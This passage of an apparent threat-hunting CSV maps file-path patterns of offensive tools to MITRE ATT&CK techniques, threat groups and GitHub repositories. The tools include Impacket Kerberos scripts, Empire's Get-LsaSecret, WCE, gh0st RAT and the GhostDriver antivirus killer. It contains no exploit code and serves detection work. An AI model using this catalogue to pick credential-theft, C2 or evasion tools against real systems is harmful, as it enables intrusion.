Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","7370"
"*/Get-LsaSecret.*",".{0,1000}\/Get\-LsaSecret\..{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","7371"
"*/getlsasrvaddr.exe*",".{0,1000}\/getlsasrvaddr\.exe.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","1","N/A","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","7372"
"*/Get-NetNTLM.git*",".{0,1000}\/Get\-NetNTLM\.git.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","1","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","7373"
"*/Get-NetNTLM.ps1*",".{0,1000}\/Get\-NetNTLM\.ps1.{0,1000}","offensive_tool_keyword","Get-NetNTLM","Powershell module to get the NetNTLMv2 hash of the current user","T1110.003 - T1557.001 - T1040","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/elnerd/Get-NetNTLM","1","1","N/A","N/A","7","1","93","18","2022-07-05T20:55:33Z","2019-02-11T23:09:54Z","7374"
"*/GetNPUsers.exe*",".{0,1000}\/GetNPUsers\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7375"
"*/GetNPUsers.py*",".{0,1000}\/GetNPUsers\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","7376"
"*/GetNPUsers.py*",".{0,1000}\/GetNPUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7377"
"*/getOSandSMBproperties.exe*",".{0,1000}\/getOSandSMBproperties\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7378"
"*/Get-OSTokenInformation.ps1*",".{0,1000}\/Get\-OSTokenInformation\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7379"
"*/getPac.exe*",".{0,1000}\/getPac\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7380"
"*/getPac.py*",".{0,1000}\/getPac\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7381"
"*/GetPasswords.ps1*",".{0,1000}\/GetPasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","7382"
"*/Get-ScheduledTaskComHandler.ps1*",".{0,1000}\/Get\-ScheduledTaskComHandler\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7383"
"*/get-shucking.php*",".{0,1000}\/get\-shucking\.php.{0,1000}","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","N/A","10","1","69","9","2024-10-18T10:45:49Z","2023-01-27T07:52:47Z","7384"
"*/Get-SMBSigning.ps1*",".{0,1000}\/Get\-SMBSigning\.ps1.{0,1000}","offensive_tool_keyword","CheckSMBSigning","Checks for SMB signing disabled on all hosts in the network","T1018 - T1550","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/Leo4j/CheckSMBSigning","1","1","N/A","N/A","6","1","8","1","2023-10-13T11:55:33Z","2023-05-17T11:47:52Z","7385"
"*/getST.py*",".{0,1000}\/getST\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7386"
"*/getST2.py*",".{0,1000}\/getST\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7387"
"*/get-system/getsystem.c*",".{0,1000}\/get\-system\/getsystem\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","7388"
"*/Get-TGSCipher.ps1*",".{0,1000}\/Get\-TGSCipher\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","7389"
"*/getTGT.py*",".{0,1000}\/getTGT\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7390"
"*/GetUserSPNs.py*",".{0,1000}\/GetUserSPNs\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","7391"
"*/GetWebDAVStatus_BOF/*",".{0,1000}\/GetWebDAVStatus_BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Determine if the WebClient Service (WebDAV) is running on a remote system","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/G0ldenGunSec/GetWebDAVStatus","1","1","N/A","N/A","10","10","133","27","2024-03-09T22:49:45Z","2021-09-29T17:31:21Z","7392"
"*/Get-WLAN-Keys.ps1*",".{0,1000}\/Get\-WLAN\-Keys\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7393"
"*/gh0st.exe*",".{0,1000}\/gh0st\.exe.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","7394"
"*/gh0st.git*",".{0,1000}\/gh0st\.git.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","1","N/A","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","7395"
"*/ghauri.git*",".{0,1000}\/ghauri\.git.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","7396"
"*/ghauri.py*",".{0,1000}\/ghauri\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","1","N/A","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","7397"
"*/ghauri/ghauri/*",".{0,1000}\/ghauri\/ghauri\/.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#linux","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","7398"
"*/ghidra*",".{0,1000}\/ghidra.{0,1000}","offensive_tool_keyword","ghidra","Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate. This framework includes a suite of full-featured. high-end software analysis tools that enable users to analyze compiled code on a variety of platforms including Windows. macOS. and Linux. Capabilities include disassembly. assembly. decompilation. graphing. and scripting. along with hundreds of other features. Ghidra supports a wide variety of processor instruction sets and executable formats and can be run in both user-interactive and automated modes. Users may also develop their own Ghidra plug-in components and/or scripts using Java or Python.","T1057 - T1053 - T1564 - T1204 - T1083","TA0002 - TA0011 - TA0008","N/A","N/A","Framework","https://github.com/NationalSecurityAgency/ghidra","1","0","N/A","N/A","N/A","10","56448","6313","2025-04-22T12:58:37Z","2019-03-01T03:27:48Z","7399"
"*/GhostDriver.exe*",".{0,1000}\/GhostDriver\.exe.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","7400"
"*/GhostDriver.git*",".{0,1000}\/GhostDriver\.git.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","7401"
"*/ghostdriver.sys*",".{0,1000}\/ghostdriver\.sys.{0,1000}","offensive_tool_keyword","GhostDriver","GhostDriver is a Rust-built AV killer tool using BYOVD","T1562.001  - T1211 - T1055.001","TA0005 - TA0002","N/A","Black Basta","Defense Evasion","https://github.com/BlackSnufkin/GhostDriver","1","1","N/A","N/A","9","3","270","38","2023-12-12T13:52:32Z","2023-12-02T23:56:13Z","7402"
"*/ghostfile.aspx*",".{0,1000}\/ghostfile\.aspx.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","7403"
"*/GhostInTheNet.git*",".{0,1000}\/GhostInTheNet\.git.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","7404"
"*/GhostInTheNet.sh*",".{0,1000}\/GhostInTheNet\.sh.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","7405"
"*/GhostInTheNet-master*",".{0,1000}\/GhostInTheNet\-master.{0,1000}","offensive_tool_keyword","GhostInTheNet","Ultimate Network Stealther that makes Linux a Ghost In The Net and protects from MITM/DOS/scan","T1574 - T1565 - T1055","TA0007 - TA0040 - TA0043","N/A","N/A","Sniffing & Spoofing","https://github.com/cryptolok/GhostInTheNet","1","1","#linux","N/A","7","4","372","79","2023-04-27T07:07:29Z","2017-04-22T01:53:16Z","7406"
"*/GhostMapper.git*",".{0,1000}\/GhostMapper\.git.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","7407"
"*/GhostMapper.sln*",".{0,1000}\/GhostMapper\.sln.{0,1000}","offensive_tool_keyword","GhostMapper","GhostMapper involves modifying Windows system ""dump_"" prefix drivers to exploit crash handling mechanisms for malicious purposes.","T1014 - T1070.004 - T1055.011","TA0003 - TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Oliver-1-1/GhostMapper","1","1","N/A","N/A","8","3","279","62","2025-04-12T19:17:46Z","2023-10-31T11:26:33Z","7408"
"*/GhostMouse.exe*",".{0,1000}\/GhostMouse\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7409"
"*/ghostsocks.git*",".{0,1000}\/ghostsocks\.git.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","1","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","7410"
"*/GhostTask.git*",".{0,1000}\/GhostTask\.git.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","7411"
